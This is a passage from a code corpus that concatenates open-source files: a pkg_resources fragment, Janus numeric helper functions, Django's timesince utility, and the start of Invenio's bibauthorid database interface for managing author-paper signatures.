add_activation_listener(lambda dist: dist.activate())
working_set.entries=[]
list(map(working_set.add_entry,sys.path)) # match order
| mit |
JanusWind/FC | janus_helper.py | 1 | 4081 | ################################################################################
##
## Janus -- GUI Software for Processing Thermal-Ion Measurements from the
## Wind Spacecraft's Faraday Cups
##
## Copyright (C) 2016 Bennett A. Maruca (bmaruca@udel.edu)
##
## This program is free software: you can redistribute it and/or modify it under
## the terms of the GNU General Public License as published by the Free Software
## Foundation, either version 3 of the License, or (at your option) any later
## version.
##
## This program is distributed in the hope that it will be useful, but WITHOUT
## ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
## FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
## details.
##
## You should have received a copy of the GNU General Public License along with
## this program. If not, see http://www.gnu.org/licenses/.
##
################################################################################
################################################################################
## LOAD THE NECESSARY MODULES.
################################################################################
from math import log10, floor, sqrt, fsum
################################################################################
## DEFINE THE FUNCTION FOR ROUNDING A VALUE AND CONVERTING IT TO A STRING.
################################################################################
# Define the function for rounding a value to a specified number of significant
# digits.
def round_sig( val, sig ) :
	"""Round `val` to `sig` significant digits; None and 0. pass through."""
	if val is None :
		return None
	if val == 0. :
		return 0.
	magnitude = int( floor( log10( abs( val ) ) ) )
	return round( val, sig - magnitude - 1 )
################################################################################
## DEFINE THE FUNCTION FOR COMPUTING UNIT VECTOR
################################################################################
# Define the function for computing unit vector
def calc_arr_norm( v ):
	"""Return `v` scaled to unit magnitude, as a tuple."""
	magnitude = sqrt( fsum( c ** 2 for c in v ) )
	return tuple( c / magnitude for c in v )
################################################################################
## DEFINE THE FUNCTION FOR COMPUTING DOT PRODUCT
################################################################################
# Define the function for computing dot product
def calc_arr_dot( u, v ) :
	"""Return the dot product of equal-length sequences `u` and `v`."""
	if len( u ) != len( v ) :
		raise TypeError( 'Unequal lengths.' )
	return fsum( a * b for a, b in zip( u, v ) )
################################################################################
## DEFINE THE FUNCTIONS FOR CONVERTING TO/FROM NNI'S
################################################################################
# Note. The set of "NNI" values is defined to include all non-negative integers
# and "float('inf')".
# Define the function for converting a string to an NNI.
def str_to_nni( v ) :
	"""Convert `v` to an "NNI": a non-negative integer or float('inf').

	Accepts any value whose string form (case-insensitive, spaces
	stripped) is 'inf', 'infinity', or an integer literal.  Raises
	TypeError for negative integers and ValueError for other strings.
	"""
	# Standardize the argument by ensuring that it is a string, writing
	# all letters in lower case, and removing whitespace.
	val = str( v ).lower( ).replace( ' ', '' )
	# If the string indicates an infinite value, return 'float( 'inf' )'.
	# Otherwise, attempt to return a non-negative integer.
	if ( ( val == 'inf' ) or ( val == 'infinity' ) ) :
		return float( 'inf' )
	else :
		# Convert the argument to an integer.
		ret = int( val )
		# A negative integer is not a valid NNI; reject it.  (An
		# unreachable 'return None' that followed this 'raise' in the
		# original code has been removed.)
		if ( ret < 0 ) :
			raise TypeError( 'Negative integer not permitted.' )
		return ret
"""
# Define the function for converting a numerical value to a string with a
# specified number of significant digits.
def conv_val_to_str( val, sig ) :
# Round the value to the specified number of significant digits.
rnd = round_sig( val, sig )
# Convert the rounded value into an appropriately formatted string and
# return it.
if ( ( abs( rnd ) >= 0.01 ) and
( abs( rnd ) < 10.**sig ) ) :
return( '{:f}'.format( rnd ) )
else :
return( '{:e}'.format( rnd ) )
"""
| gpl-3.0 |
marckuz/django | django/utils/timesince.py | 409 | 2671 | from __future__ import unicode_literals
import calendar
import datetime
from django.utils.html import avoid_wrapping
from django.utils.timezone import is_aware, utc
from django.utils.translation import ugettext, ungettext_lazy
# (seconds-per-unit, lazily-pluralized format string) pairs ordered from
# the largest unit to the smallest; timesince() scans them in order to
# find the most significant nonzero unit.
TIMESINCE_CHUNKS = (
    (60 * 60 * 24 * 365, ungettext_lazy('%d year', '%d years')),
    (60 * 60 * 24 * 30, ungettext_lazy('%d month', '%d months')),
    (60 * 60 * 24 * 7, ungettext_lazy('%d week', '%d weeks')),
    (60 * 60 * 24, ungettext_lazy('%d day', '%d days')),
    (60 * 60, ungettext_lazy('%d hour', '%d hours')),
    (60, ungettext_lazy('%d minute', '%d minutes'))
)
def timesince(d, now=None, reversed=False):
    """
    Takes two datetime objects and returns the time between d and now
    as a nicely formatted string, e.g. "10 minutes". If d occurs after now,
    then "0 minutes" is returned.
    Units used are years, months, weeks, days, hours, and minutes.
    Seconds and microseconds are ignored. Up to two adjacent units will be
    displayed. For example, "2 weeks, 3 days" and "1 year, 3 months" are
    possible outputs, but "2 weeks, 3 hours" and "1 year, 5 days" are not.
    Adapted from
    http://web.archive.org/web/20060617175230/http://blog.natbat.co.uk/archive/2003/Jun/14/time_since
    """
    # Convert datetime.date to datetime.datetime for comparison.
    if not isinstance(d, datetime.datetime):
        d = datetime.datetime(d.year, d.month, d.day)
    if now and not isinstance(now, datetime.datetime):
        now = datetime.datetime(now.year, now.month, now.day)
    if not now:
        now = datetime.datetime.now(utc if is_aware(d) else None)
    delta = (d - now) if reversed else (now - d)
    # Deal with leap years by subtracting the number of leap days between the two years.
    delta -= datetime.timedelta(calendar.leapdays(d.year, now.year))
    # Ignore microseconds: express the whole delta in integer seconds.
    since = delta.days * 24 * 60 * 60 + delta.seconds
    if since <= 0:
        # d is in the future compared to now, stop processing.
        return avoid_wrapping(ugettext('0 minutes'))
    # Find the largest unit with a nonzero count.
    for i, (seconds, name) in enumerate(TIMESINCE_CHUNKS):
        count = since // seconds
        if count != 0:
            break
    result = avoid_wrapping(name % count)
    if i + 1 < len(TIMESINCE_CHUNKS):
        # Now get the second item: the count of the next-smaller unit.
        seconds2, name2 = TIMESINCE_CHUNKS[i + 1]
        count2 = (since - (seconds * count)) // seconds2
        if count2 != 0:
            result += ugettext(', ') + avoid_wrapping(name2 % count2)
    return result
def timeuntil(d, now=None):
    """Return the time remaining until `d`, formatted like ``timesince``."""
    return timesince(d, now, reversed=True)
| bsd-3-clause |
inspirehep/invenio | modules/bibauthorid/lib/bibauthorid_dbinterface.py | 2 | 174626 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2011, 2012, 2013, 2015, 2018 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
'''
Filename: bibauthorid_dbinterface.py
This is the only file in bibauthorid which should
use the database. It offers an interface for all
the other files in the module.
'''
from invenio.config import CFG_SITE_URL, \
CFG_BIBAUTHORID_SEARCH_ENGINE_MAX_DATACHUNK_PER_INSERT_DB_QUERY
import invenio.bibauthorid_config as bconfig
import gc
import datetime
from itertools import groupby, count, ifilter, chain, imap, repeat, izip
from operator import itemgetter
from invenio.search_engine import deserialize_via_marshal
from invenio.search_engine_utils import get_fieldvalues
from invenio.access_control_engine import acc_authorize_action
from invenio.config import CFG_SITE_URL
from invenio.dbquery import run_sql
from invenio.errorlib import register_exception
from invenio import bibtask
from msgpack import packb as serialize
from msgpack import unpackb as deserialize
try:
from collections import defaultdict
except ImportError:
from invenio.bibauthorid_general_utils import defaultdict
from invenio.dbquery import run_sql
from invenio.htmlutils import X
from invenio.search_engine import perform_request_search, get_record
from invenio.bibrecord import record_get_field_value, \
record_get_field_instances
from invenio.access_control_engine import acc_authorize_action
from invenio.bibauthorid_name_utils import split_name_parts, \
create_canonical_name, create_matchable_name
from invenio.bibauthorid_general_utils import memoized
from invenio.bibauthorid_general_utils import monitored
from invenio.bibauthorid_logutils import Logger
import time
from invenio.intbitset import intbitset
import re
# run_sql = monitored(run_sql)
# Module-level logger for this database-interface layer.
logger = Logger("db_interface")
# Global cache for MARC 100/700 field data; None until populated
# (presumably by code later in this module -- confirm before relying on it).
MARC_100_700_CACHE = None
#
#
# aidPERSONIDPAPERS table ###
#
#
# ********** setters **********#
def add_signature(sig, name, pid, flag=0, user_level=0, m_name=None):
    '''
    Adds the given signature to the specified author.
    @param sig: signature (bibref_table, bibref_value, bibrec)
    @type sig: tuple (int, int, int)
    @param name: name to be assigned for the author
    @type name: str
    @param pid: author identifier
    @type pid: int
    @param flag: author-paper association status
    @type flag: int
    @param user_level: lcul
    @type user_level: int
    @param m_name: matchable (normalized) form of `name`; derived from
        `name` when not supplied
    @type m_name: str
    '''
    if not name:
        name = get_name_by_bibref(sig[0:2])
    if not m_name:
        m_name = create_matchable_name(name)
    run_sql('insert into aidPERSONIDPAPERS'
            '(personid, bibref_table, bibref_value, bibrec, name, m_name, flag, lcul) '
            'values (%s, %s, %s, %s, %s, %s, %s, %s)',
            (pid, str(sig[0]), sig[1], sig[2], name, m_name, flag, user_level))
def move_signature(sig, pid, force_claimed=False, set_unclaimed=False):
    '''
    Reassigns an already assigned signature to a different author.
    @param sig: signature (bibref_table, bibref_value, bibrec)
    @type sig: tuple (int, int, int)
    @param pid: author identifier
    @type pid: int
    @param force_claimed: only if signature is claimed or rejected
    @type force_claimed: bool
    @param set_unclaimed: set signature as unclaimed
    @type set_unclaimed: bool
    '''
    # The UPDATE statement is assembled incrementally from the options below.
    query = ('update aidPERSONIDPAPERS '
             'set personid=%s ')
    if set_unclaimed:
        query += ", flag=0 "
    query += ('where bibref_table like %s '
              'and bibref_value=%s '
              'and bibrec=%s ')
    # Unless forced, rows flagged as claimed (2) or rejected (-2) are left alone.
    if not force_claimed:
        query += " and (flag <> 2 and flag <> -2)"
    run_sql(query, (pid, int(sig[0]), sig[1], sig[2]))
def modify_signature(old_ref, rec, new_ref, new_name):
    '''
    Modifies an already assigned signature.
    @param old_ref: old bibref (bibref_table, bibref_value)
    @type old_ref: tuple (int, int)
    @param rec: paper identifier
    @type rec: int
    @param new_ref: new bibref (bibref_table, bibref_value)
    @type new_ref: tuple (int, int)
    @param new_name: new name to be assigned for the author; looked up from
        `new_ref` when empty
    @type new_name: str
    '''
    if not new_name:
        new_name = get_name_by_bibref(new_ref)
    # Recompute the matchable form so m_name stays in sync with the new name.
    m_name = create_matchable_name(new_name)
    run_sql('update aidPERSONIDPAPERS '
            'set bibref_table=%s, bibref_value=%s, name=%s, m_name=%s '
            'where bibref_table like %s '
            'and bibref_value=%s '
            'and bibrec=%s',
            (str(new_ref[0]), new_ref[1], new_name, m_name,
             str(old_ref[0]), old_ref[1], rec))
def remove_signatures(sigs): # remove_sigs
    '''
    Deletes the given signatures.
    @param sigs: signatures to be removed [(bibref_table, bibref_value, bibrec),]
    @type sigs: list [(int, int, int),]
    '''
    for signature in sigs:
        _delete_from_aidpersonidpapers_where(table=signature[0],
                                             ref=signature[1],
                                             rec=signature[2])
def remove_papers(recs): # remove_all_bibrecs
    '''
    Deletes all data about the given papers from all authors.
    @param recs: paper identifiers
    @type recs: list [int,]
    '''
    if recs:
        # NOTE(review): the id list is interpolated straight into the SQL via
        # _get_sqlstr_from_set -- presumed to emit a literal "(1,2,...)" from
        # integer ids only; confirm it is never fed unsanitized strings.
        recs_sqlstr = _get_sqlstr_from_set(recs)
        run_sql('delete from aidPERSONIDPAPERS '
                'where bibrec in %s' % recs_sqlstr)
def transfer_papers_to_author(papers_data, new_pid):
    '''
    It passes possesion of papers to another author.
    @param papers_data: paper relevant data
        [(pid, bibref_table, bibref_value, bibrec, flag),]
    @type papers_data: list [(int, str, int, int, int),]
    @param new_pid: author identifier
    @type new_pid: int
    '''
    # The existing flag value is written back unchanged; only ownership moves.
    for pid, table, ref, rec, flag in papers_data:
        run_sql('update aidPERSONIDPAPERS '
                'set personid=%s, flag=%s '
                'where personid=%s '
                'and bibref_table like %s '
                'and bibref_value=%s '
                'and bibrec=%s',
                (new_pid, flag, pid, table, ref, rec))
def confirm_papers_to_author(pid, sigs_str, user_level=0): # confirm_papers_to_person
    '''
    Confirms the relationship between the given author and the specified papers
    (from user input).
    @param pid: author identifier
    @type pid: int
    @param sigs_str: signatures to confirm (e.g. [('100:7531,9024'),] )
    @type sigs_str: list [(str),]
    @param user_level: lcul
    @type user_level: int
    @return: confirmation status and message key for each signature [(status, message_key),]
    @rtype: list [(bool, str),]
    '''
    pids_to_update = set([pid])
    statuses = list()
    for s in sigs_str:
        sig = _split_signature_string(s)
        table, ref, rec = sig
        # the paper should be present, either assigned or rejected
        papers = run_sql('select bibref_table, bibref_value, bibrec, personid, flag '
                         'from aidPERSONIDPAPERS '
                         'where bibrec=%s '
                         'and flag >= -2',
                         (rec,))
        # The single query above is partitioned in Python into the subsets
        # that the commented-out SQL snippets below would have selected.
        # select bibref_table, bibref_value, bibrec
        # from aidPERSONIDPAPERS
        # where personid=pid
        # and bibrec=rec
        # and flag > -2
        author_not_rejected_papers = [p[0:3] for p in papers if p[3] == pid and p[4] > -2]
        # select bibref_table, bibref_value, bibrec
        # from aidPERSONIDPAPERS
        # where personid=pid
        # and bibrec=rec
        # and flag=-2
        author_rejected_papers = [p[0:3] for p in papers if p[3] == pid and p[4] == -2]
        # select bibref_table, bibref_value, bibrec
        # from aidPERSONIDPAPERS
        # where personid <> pid
        # and bibrec=rec
        # and flag > -2
        diff_author_not_rejected_papers = [p[0:3] for p in papers if p[3] != pid and p[4] > -2]
        # select *
        # from aidPERSONIDPAPERS "
        # where bibref_table=table
        # and bibref_value=ref
        # and bibrec=rec
        # and flag > -2
        sig_exists = [True for p in papers if p[0] == table and p[1] == ref and p[4] > -2]
        # All papers that are being claimed should be present in aidPERSONIDPAPERS, thus:
        # assert author_not_rejected_papers or author_rejected_papers or diff_author_not_rejected_papers, 'There should be at least something regarding this bibrec!'
        # assert sig_exists, 'The signature should exist'
        # should always be valid.
        # BUT, it usually happens that claims get done out of the browser/session cache which is hours/days old,
        # hence it happens that papers are claimed when they no longer exist in the system.
        # For the sake of mental sanity, instead of crashing from now on we just ignore such cases.
        if not (author_not_rejected_papers or author_rejected_papers or diff_author_not_rejected_papers) or not sig_exists:
            statuses.append({'success': False, 'operation': 'confirm'})
            continue
        statuses.append({'success': True, 'operation': 'confirm'})
        # It should not happen that a paper is assigned more than once to the same person.
        # But sometimes it happens in rare unfortunate cases of bad concurrency circumstances,
        # so we try to fix it directly instead of crashing here.
        # Once a better solution for dealing with concurrency is found, the following asserts
        # shall be reenabled to allow better control on what happens.
        # assert len(author_not_rejected_papers) < 2, "This paper should not be assigned to this person more then once! %s" % author_not_rejected_papers
        # assert len(diff_author_not_rejected_papers) < 2, "There should not be
        # more than one copy of this paper! %s" % diff_author_not_rejected_papers
        # If the bibrec is present with a different bibref, the existing one must be moved somewhere
        # else before we can claim the incoming one.
        for pap in author_not_rejected_papers:
            # move to someone else all unwanted signatures
            if pap != sig:
                new_pid = get_free_author_id()
                pids_to_update.add(new_pid)
                move_signature(pap, new_pid)
        # Make sure that the incoming claim is unique and get rid of all rejections, they are useless
        # from now on.
        remove_signatures([sig])
        add_signature(sig, None, pid)
        # Mark the freshly (re)inserted signature as claimed (flag=2).
        run_sql('update aidPERSONIDPAPERS '
                'set personid=%s, flag=%s, lcul=%s '
                'where bibref_table like %s '
                'and bibref_value=%s '
                'and bibrec=%s',
                (pid, '2', user_level, table, ref, rec))
    update_canonical_names_of_authors(pids_to_update)
    # TODO: UPDATE EXTERNAL IDS OF AUTHOR!!
    return statuses
def reject_papers_from_author(pid, sigs_str, user_level=0): # reject_papers_from_person
    '''
    Confirms the negative relationship between the given author and the
    specified papers (from user input).
    @param pid: author identifier
    @type pid: int
    @param sigs_str: signatures to reject (e.g. [('100:7531,9024'),] )
    @type sigs_str: list [(str),]
    @param user_level: lcul
    @type user_level: int
    @return: confirmation status and message key for each signature [(status, message_key),]
    @rtype: list [(bool, str),]
    '''
    pids_to_update = set([pid])
    statuses = list()
    for s in sigs_str:
        sig = _split_signature_string(s)
        name = get_name_by_bibref(sig[:2])
        matchable_name = create_matchable_name(name)
        matched_authors_pids = get_authors_by_name(matchable_name,
                                                   use_matchable_name=True)
        # We will choose a new author from the matched_authors_pids list.
        # We need to ensure that the current author's pid is no longer in the list.
        try:
            matched_authors_pids.remove(pid)
        except ValueError:
            # Happens when the signature name differs from current author's name.
            pass
        new_pid = None
        # Prefer an existing same-named author who has no association (not
        # even a rejection) with this paper; otherwise mint a fresh author id.
        for potential_pid in matched_authors_pids:
            if not get_signatures_of_paper_and_author(sig,
                                                      potential_pid,
                                                      include_rejected=True):
                new_pid = potential_pid
                break
        if not new_pid:
            new_pid = get_free_author_id()
        table, ref, rec = sig
        # the paper should be present, either assigned or rejected
        sig_exists = get_author_info_of_confirmed_paper(sig)
        # For the sake of mental sanity (see comments in confirm_papers_to_author) just ignore if this paper no longer exists.
        # assert sig_exists, 'The signature should exist'
        if not sig_exists:
            statuses.append({'success': False, 'operation': 'reject'})
            continue
        statuses.append({'success': True, 'operation': 'reject'})
        # If the record is already assigned to a different person the rejection is meaningless.
        # If not, we assign the paper to someone else (it doesn't matter who because eventually
        # it will be reassigned by tortoise) and reject it from the current person.
        current_pid, name = sig_exists[0]
        if current_pid == pid:
            sig_is_claimed = author_has_claimed_signature(pid, sig)
            move_signature(sig, new_pid,
                           force_claimed=sig_is_claimed,
                           set_unclaimed=True)
            pids_to_update.add(new_pid)
        # Record the explicit rejection (flag=-2) for the current author.
        add_signature((table, ref, rec), name, pid, flag=-2, user_level=user_level)
    update_canonical_names_of_authors(pids_to_update)
    return statuses
def author_has_claimed_signature(pid, sig, negative=False):
    """
    Checks whether a particular author has claimed one signature.
    @param pid: the person id of the author
    @type pid: int
    @param sig: the signature in question (100 / 700, bibref, bibrec)
    @type sig: tuple of 3 elements
    @param negative: if this is a "disclaim"
    @type negative: boolean
    @return: A boolean indicating whether the person has claimed a signature.
    """
    try:
        # NOTE(review): this is effectively a row-existence test -- `[0][0]`
        # is the first column of `select *` (presumably personid, never < 0),
        # so any matching row yields True and no rows raise IndexError.
        return run_sql("""select * from aidPERSONIDPAPERS
                       where personid = %s and bibref_table = %s
                       and bibref_value = %s and bibrec = %s
                       and flag = %s""",
                       (pid, str(sig[0]), sig[1], sig[2],
                        -2 if negative else 2))[0][0] > -1
    except IndexError:
        return False
def reset_papers_of_author(pid, sigs_str): # reset_papers_flag
    '''
    Redefines the relationship of the given author and the specified papers as
    neutral (neither claimed nor rejected).
    @param pid: author identifier
    @type pid: int
    @param sigs_str: signatures to reset (e.g. [('100:7531,9024'),] )
    @type sigs_str: list [(str),]
    @return: confirmation status and message key for each signature [(status, message_key),]
    @rtype: list [(bool, str),]
    '''
    statuses = list()
    for s in sigs_str:
        sig = _split_signature_string(s)
        table, ref, rec = sig
        papers = _select_from_aidpersonidpapers_where(
            select=['bibref_table',
                    'bibref_value',
                    'bibrec',
                    'flag'],
            table=table,
            ref=ref,
            pid=pid,
            rec=rec)
        assert len(papers) < 2
        # The query result is partitioned in Python into the subsets the
        # commented-out SQL snippets below describe.
        # select bibref_table, bibref_value, bibrec
        # from aidPERSONIDPAPERS
        # where personid=pid
        # and bibrec=rec
        # and flag=-2
        author_rejected_papers = [p[0:3] for p in papers if p[3] == -2]
        # select bibref_table, bibref_value, bibrec
        # from aidPERSONIDPAPERS
        # where personid=pid
        # and bibref_table=table
        # and bibref_value=ref
        # and bibrec=rec
        # and flag > -2
        sig_exists = [p[0:3] for p in papers if p[0] == table and p[1] == ref and p[3] > -2]
        # For the sake of mental sanity (see comments in confirm_papers_to_author) just ignore if this paper no longer exists.
        # assert sig_exists, 'The signature should exist'
        if author_rejected_papers or not sig_exists:
            statuses.append({'success': False, 'operation': 'reset'})
            continue
        statuses.append({'success': True, 'operation': 'reset'})
        # Delete the row and re-add it with the default (neutral) flag.
        run_sql('delete from aidPERSONIDPAPERS '
                'where bibref_table like %s '
                'and bibref_value=%s '
                'and bibrec=%s', sig)
        add_signature(sig, None, pid)
    return statuses
def duplicated_conirmed_papers_exist(printer, repair=False): # check_duplicated_papers
    '''
    It examines if there are records of confirmed papers in aidPERSONIDPAPERS
    table which are in an impaired state (duplicated) and repairs them if
    specified.

    NOTE(review): the function name misspells 'confirmed'; kept as-is for
    compatibility with existing callers.

    @param printer: for log keeping
    @type printer: func
    @param repair: fix the duplicated records
    @type repair: bool

    @return: duplicated records are found
    @rtype: bool
    '''
    duplicated_conirmed_papers_found = False
    author_confirmed_papers = dict()
    to_reassign = list()

    # Map each author to the list of his non-rejected papers; a bibrec that
    # appears more than once in the list is a duplicate.
    confirmed_papers = run_sql('select personid, bibrec '
                               'from aidPERSONIDPAPERS '
                               'where flag <> %s', (-2,))
    for pid, rec in confirmed_papers:
        author_confirmed_papers.setdefault(pid, []).append(rec)

    for pid, recs in author_confirmed_papers.iteritems():
        if not len(recs) == len(set(recs)):
            duplicated_conirmed_papers_found = True
            # Sorting makes duplicates adjacent, so comparing each element
            # with its successor collects every repeated bibrec.
            duplicates = sorted(recs)
            duplicates = set([rec for i, rec in enumerate(duplicates[:-1]) if rec == duplicates[i + 1]])
            printer("Person %d has duplicated papers: %s" % (pid, duplicates))

            if repair:
                for duprec in duplicates:
                    printer("Repairing duplicated bibrec %s" % str(duprec))
                    claimed_from_involved = run_sql('select personid, bibref_table, bibref_value, bibrec, flag '
                                                    'from aidPERSONIDPAPERS '
                                                    'where personid=%s '
                                                    'and bibrec=%s '
                                                    'and flag >= 2', (pid, duprec))
                    if len(claimed_from_involved) != 1:
                        # Zero or several claimed rows: drop everything for
                        # this (author, record) and let rabbit reassign it.
                        to_reassign.append(duprec)
                        _delete_from_aidpersonidpapers_where(rec=duprec, pid=pid)
                    else:
                        # Exactly one claimed row: keep it, delete the rest.
                        run_sql('delete from aidPERSONIDPAPERS '
                                'where personid=%s '
                                'and bibrec=%s '
                                'and flag < 2', (pid, duprec))

    if repair and to_reassign:
        printer("Reassigning deleted bibrecs %s" % str(to_reassign))
        from invenio.bibauthorid_rabbit import rabbit
        rabbit(to_reassign)

    return duplicated_conirmed_papers_found
def duplicated_confirmed_signatures_exist(printer, repair=False): # check_duplicated_signatures
    '''
    It examines if there are records of confirmed signatures in
    aidPERSONIDPAPERS table which are in an impaired state (duplicated) and
    repairs them if specified.

    @param printer: for log keeping
    @type printer: func
    @param repair: fix the duplicated signatures
    @type repair: bool

    @return: duplicated signatures are found
    @rtype: bool
    '''
    duplicated_confirmed_signatures_found = False
    paper_confirmed_bibrefs = dict()
    to_reassign = list()

    # Map each paper to all (table, ref) pairs confirmed on it; the same
    # pair occurring twice on one paper is the impaired state we look for.
    confirmed_sigs = run_sql('select bibref_table, bibref_value, bibrec '
                             'from aidPERSONIDPAPERS '
                             'where flag > %s', (-2,))
    for table, ref, rec in confirmed_sigs:
        paper_confirmed_bibrefs.setdefault(rec, []).append((table, ref))

    for rec, bibrefs in paper_confirmed_bibrefs.iteritems():
        if not len(bibrefs) == len(set(bibrefs)):
            duplicated_confirmed_signatures_found = True
            # Sorting makes duplicates adjacent, so comparing each element
            # with its successor collects every repeated pair.
            duplicates = sorted(bibrefs)
            duplicates = set([bibref for i, bibref in enumerate(duplicates[:-1]) if bibref == duplicates[i + 1]])
            printer("Paper %d has duplicated signatures: %s" % (rec, duplicates))

            if repair:
                for table, ref in duplicates:
                    printer("Repairing duplicated signature %s" % str((table, ref)))
                    claimed = _select_from_aidpersonidpapers_where(
                        select=['personid',
                                'bibref_table',
                                'bibref_value',
                                'bibrec'],
                        table=table,
                        ref=ref,
                        rec=rec,
                        flag=2)
                    if len(claimed) != 1:
                        # Zero or several claimed rows: delete them all and
                        # let rabbit reassign the record.
                        to_reassign.append(rec)
                        _delete_from_aidpersonidpapers_where(table=table, ref=ref, rec=rec)
                    else:
                        # Exactly one claimed row: keep it, delete the rest.
                        run_sql('delete from aidPERSONIDPAPERS '
                                'where bibref_table like %s '
                                'and bibref_value=%s '
                                'and bibrec=%s '
                                'and flag < 2', (table, ref, rec))

    if repair and to_reassign:
        printer("Reassigning deleted bibrecs %s" % str(to_reassign))
        from invenio.bibauthorid_rabbit import rabbit
        rabbit(to_reassign)

    return duplicated_confirmed_signatures_found
def wrong_names_exist(printer, repair=False): # check_wrong_names
    '''
    It examines if there are records in aidPERSONIDPAPERS table which carry a
    wrong name and repairs them if specified.

    @param printer: for log keeping
    @type printer: func
    @param repair: fix the found wrong names
    @type repair: bool

    @return: wrong names are found
    @rtype: bool
    '''
    wrong_names_found = False
    wrong_names, wrong_names_count = get_wrong_names()

    if wrong_names_count > 0:
        wrong_names_found = True
        printer("%d corrupted names in aidPERSONIDPAPERS." % wrong_names_count)
        for wrong_name in wrong_names:
            # wrong_name is (bibref_table, bibref_value, correct_name,
            # stored_name); a falsy correct_name means the bibref id no
            # longer resolves to any name (see get_wrong_names).
            if wrong_name[2]:
                printer(
                    "Outdated name, ('%s' instead of '%s' (%s:%d))." %
                    (wrong_name[3], wrong_name[2], wrong_name[0], wrong_name[1]))
            else:
                printer("Invalid id (%s:%d)." % (wrong_name[0], wrong_name[1]))

            if repair:
                printer("Fixing wrong name: %s" % str(wrong_name))
                if wrong_name[2]:
                    m_name = create_matchable_name(wrong_name[2])
                    # BUGFIX: the SET clause used to end with a stray comma
                    # ("set name=%s, m_name=%s, where ..."), which is invalid
                    # SQL and made every repair of an outdated name fail.
                    run_sql('update aidPERSONIDPAPERS '
                            'set name=%s, m_name=%s '
                            'where bibref_table like %s '
                            'and bibref_value=%s',
                            (wrong_name[2], m_name, wrong_name[0], wrong_name[1]))
                else:
                    # The bibref id is gone entirely: drop the rows.
                    _delete_from_aidpersonidpapers_where(table=wrong_name[0], ref=wrong_name[1])

    return wrong_names_found
def impaired_rejections_exist(printer, repair=False): # check_wrong_rejection
    '''
    It examines if there are records of rejected papers in aidPERSONIDPAPERS
    table which are in an impaired state (not assigned or both confirmed and
    rejected for the same author) and repairs them if specified.

    @param printer: for log keeping
    @type printer: func
    @param repair: fix the damaged records
    @type repair: bool

    @return: damaged records are found
    @rtype: bool
    '''
    impaired_rejections_found = False
    to_reassign = list()
    to_deal_with = list()

    # Case 1: signatures that exist only as a rejection, i.e. were never
    # reassigned anywhere after being rejected.
    rejected_papers = set(_select_from_aidpersonidpapers_where(
        select=['bibref_table', 'bibref_value', 'bibrec'], flag=-2))
    confirmed_papers = set(run_sql('select bibref_table, bibref_value, bibrec '
                                   'from aidPERSONIDPAPERS '
                                   'where flag > %s', (-2,)))
    not_assigned_papers = rejected_papers - confirmed_papers
    for paper in not_assigned_papers:
        printer("Paper (%s:%s,%s) was rejected but never reassigned" % paper)
        to_reassign.append(paper)

    # Case 2: the same (author, signature) pair appears both confirmed and
    # rejected — re-query including personid to detect that.
    rejected_papers = set(
        _select_from_aidpersonidpapers_where(
            select=[
                'personid',
                'bibref_table',
                'bibref_value',
                'bibrec'],
            flag=-2))
    confirmed_papers = set(run_sql('select personid, bibref_table, bibref_value, bibrec '
                                   'from aidPERSONIDPAPERS '
                                   'where flag > %s', (-2,)))
    # papers which are both confirmed and rejected for/from the same author
    both_confirmed_and_rejected_papers = rejected_papers & confirmed_papers
    for paper in both_confirmed_and_rejected_papers:
        printer("Conflicting assignment/rejection: %s" % str(paper))
        to_deal_with.append(paper)

    if not_assigned_papers or both_confirmed_and_rejected_papers:
        impaired_rejections_found = True

    if repair and (to_reassign or to_deal_with):
        from invenio.bibauthorid_rabbit import rabbit

        if to_reassign:
            # Rabbit is not designed to reassign signatures which are rejected but not assigned:
            # All signatures should be assigned. If a rejection occurs, the signature should get
            # moved to a new place and the rejection entry added, but never exist as a rejection only.
            # Hence, to force rabbit to reassign it we have to delete the rejection.
            printer("Reassigning bibrecs with missing entries: %s" % str(to_reassign))
            for sig in to_reassign:
                table, ref, rec = sig
                _delete_from_aidpersonidpapers_where(table=table, ref=ref, rec=rec, flag=-2)

            recs = [paper[2] for paper in to_reassign]
            rabbit(recs)

        if to_deal_with:
            # We got claims and rejections on the same paper for the same person. Let's forget about
            # it and reassign it automatically, they'll make up their minds sooner or later.
            printer("Deleting and reassigning bibrefrecs with conflicts %s" % str(to_deal_with))
            for sig in to_deal_with:
                pid, table, ref, rec = sig
                _delete_from_aidpersonidpapers_where(table=table, ref=ref, rec=rec, pid=pid)

            recs = map(itemgetter(3), to_deal_with)
            rabbit(recs)

    return impaired_rejections_found
def _delete_from_aidpersonidpapers_where(pid=None, table=None, ref=None, rec=None, name=None, flag=None, lcul=None):
    '''
    Deletes the records from aidPERSONIDPAPERS table with the given attributes.
    If no parameters are given it does nothing (never a blanket delete).

    @param pid: author identifier
    @type pid: int
    @param table: bibref_table
    @type table: int
    @param ref: bibref_value
    @type ref: int
    @param rec: paper identifier
    @type rec: int
    @param name: author name
    @type name: str
    @param flag: flag
    @type flag: int
    @param lcul: lcul
    @type lcul: int
    '''
    # Pair each optional filter with its SQL clause; only non-None values
    # contribute to the where-clause.
    optional_filters = (
        ('personid=%s', pid),
        ('bibref_table like %s', table if table is None else str(table)),
        ('bibref_value=%s', ref),
        ('bibrec=%s', rec),
        ('name=%s', name),
        ('flag=%s', flag),
        ('lcul=%s', lcul))

    clauses = []
    arguments = []
    for clause, value in optional_filters:
        if value is not None:
            clauses.append(clause)
            arguments.append(value)

    # Refuse to run without any restriction at all.
    if not clauses:
        return

    query = ('delete from aidPERSONIDPAPERS '
             'where %s') % " and ".join(clauses)
    run_sql(query, tuple(arguments))
# ********** getters **********#
def get_all_bibrecs_from_aidpersonidpapers():
    '''
    Gets all papers which are associated to some author.

    @return: paper identifiers
    @rtype: set set(int,)
    '''
    rows = _select_from_aidpersonidpapers_where(select=['bibrec'])
    return set(row[0] for row in rows)
def get_all_paper_data_of_author(pid):
    '''
    Gets all data concerning the papers that the specified author is associated
    with.
